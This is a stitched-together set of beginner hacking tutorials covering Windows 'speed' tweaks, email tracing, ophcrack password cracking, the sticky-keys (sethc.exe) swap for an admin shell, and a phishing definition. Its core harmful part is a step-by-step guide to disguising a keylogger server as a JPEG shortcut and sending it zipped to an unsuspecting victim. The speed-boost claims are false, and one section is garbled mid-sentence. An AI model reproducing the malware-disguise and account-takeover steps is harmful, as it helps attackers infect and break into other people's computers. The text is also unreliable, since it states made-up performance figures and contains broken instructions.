1) Optimize your computer's bandwidth settings by using the Windows Group Policy Editor (GPedit). Go to the start menu and click "run". Type "gpedit.msc" and press "enter." On the left side of the screen, click on "administrative templates" and select "network." Next, click on "QoS packet scheduler" and then click on "limit reservable bandwidth." Next, change the options to "enabled" and change the bandwidth limit to zero percent. This will increase your Internet speed by 20 percent.

2) Reset the Windows network sockets. An operating system uses network sockets to send information through a network. However, these network sockets can become overloaded over time. To reset the network sockets, go to "run" and type "cmd" to execute the command and prompt program. Now type "netsh winsock reset" and press "enter." To finish the task, restart your computer.

3)Increase the speed of Internet Explorer. Open the command and prompt program, type "regsvr32 actxprxy" and press "enter." This will increase the speed of Internet Explorer by about 10 percent.

4)Open your default Internet browser, and surf the web to test the new performance of your Internet.

Hide keyloggers in a .jpg file

1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked and ‘hide extensions for known file types’ is unchecked. Basically what you need is to see hidden files and see the extension of all your files on your pc.

2) Paste a copy of your server on the new created folder. Let's say it's called 'server.exe' (that's why you need the extension of files showing, cause you need to see it to change it)

3) Now you’re going to rename this 'server.exe' to whatever you want, let’s say for example 'picture.jpeg'

4) Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.

5) Now create a shortcut of this 'picture.jpeg' in the same folder.

6) Now that you have a shortcut, rename it to whatever you want, for example, 'me.jpeg'.

7) Go to properties (on file me.jpeg) and now you need to do some changes there.

8) First of all delete all the text on field 'Start In' and leave it empty.

9) Then on field 'Target' you need to write the path to open the other file (the server renamed 'picture.jpeg') so you have to write this : 'C:\WINDOWS\system32\cmd.exe / c picture.jpeg'

10) The last field, 'c picture.jpeg' is always the name of the first file. If you called the first file 'soccer.avi' you gotta write 'C:\WINDOWS\system32\cmd.exe /c soccer.avi'.

11) So what you’re doing is when someone clicks on 'me.jpeg', a cmd will execute the other file 'picture.jpeg' and the server will run.

12) On that file 'me.jpeg' (shortcut), go to properties and you have an option to change the icon. Click that and a new window will pop up and you have to write this :- %SystemRoot% \system32\SHELL32.dll . Then press OK.

13) You can set the properties 'Hidden' for the first file 'picture.jpeg' if you think it’s better to get a connection from someone.

14) But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.

15) For me for example I always want the shortcut showing first so can be the first file to be opened. So I rename the server to 'picture2.jpeg' and the shortcut to 'picture1.jpeg'.This way the shortcut will show up first. If you set hidden properties to the server 'picture.jpeg' then you don’t have to bother with this detail but I’m warning you, the hidden file will always show up inside of a Zip or a Rar file.

16) So the best way to send these files together to someone is compress them into Zip or Rar.

17) inside the Rar or Zip file you can see the files properties and even after all this work you can see that the shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to open it.

Trace An Email

Generally, the path taken by an email while traveling from sender to receiver can be explained by following diagram.

So here is the method of tracing the exact location from the email sent.I am showing the email tracing on gmail here but yahoo and other mail providing services have same concept.

Step 1:-First open up your email account and click on your inbox.

Step 2:-Now Select any email that you want to trace.

Step 3:-After Opening scrool the mail at the top and in right corner you will see a Option then Show Original click on it.

2. To see the proper location of this IP address Go to www.whatismyip.com or www.whois.domaintools.com .These websites help you to find the whole detail and satellite images ofthe ISP location from the Email was sent.

Get Your Lost Windows Password

1. Go to the ophcrack website and choose the correct operating system LiveCD to download.

2. With the downloaded .ISO, create a LiveCD the same way you did with the Ubuntu LiveCD in the Linux chapter.

3. Put the CD in your CD-Drive and restart to boot from the CD.

4. You will see the following screen:

5. Hit or wait six seconds to boot into the Ophcrack Graphic mode. If something goes wrong and the screen won’t show the Graphics, restart and go into the Ophcrack Graphic VESA mode. If this also fails, go into Ophcrack Text mode.

6. Once it ophcrack loads completely, it will automatically get your Windows password hashes and begin the cracking process.

Backup Your Email Into A Pen Drive

Reset Forgotten Windows Password

Boot off the Windows disk and select the "Repair your computer” option from the lower left-hand corner. Follow through until you get to the option to open the Command Prompt, which you’ll want to select. First you’ll want to type in the following command to backup the original sticky keys file:

copy c:\windows\system32\sethc.exe c:\ Then you’ll copy the command prompt executable (cmd.exe) over top of the sticky keys executable: copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe

Now you can reboot the PC. Resetting the Password Once you get to the login screen, hit the Shift key 5 times, and you’ll see an administrator mode command prompt. Now to reset the password—just type the following command, replacing the username and password with the combination you want: net user geek MyNewPassword That’s all there is to it. Now you can login. Of course, you’ll probably want to put the original sethc.exe file back, which you can do by rebooting into the installation CD, opening the command prompt, and copying the c:\sethc.exe file back to c:\windows\system32\sethc.exe.

Hack from the Start Screen

1. When the computer starts up, hold down F8 before you see the "Windows Starting" screen. This will bring you to a screen with choices. Your best bet will be "Safe Mode with Command Prompt". You can then do as you want.

   • Delete Account: C:>net local group Administrators# # Another way is to open up notepad, (if it's not blocked), and type in "command.com". Then go to File->Save As. A USERNAME /ADD

win the trust of the victim.

Phishing Attack:
The act of sending an e-mail to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surroundering private information that will be used for identity theft. The e-mail directs the user to visit a Web site where they are asked to update personal information, such as passwords and credit card, social security, and bank account numbers, that the legitimate organization already has. The Web site, however, is bogus and set up only to steal the user’s information.
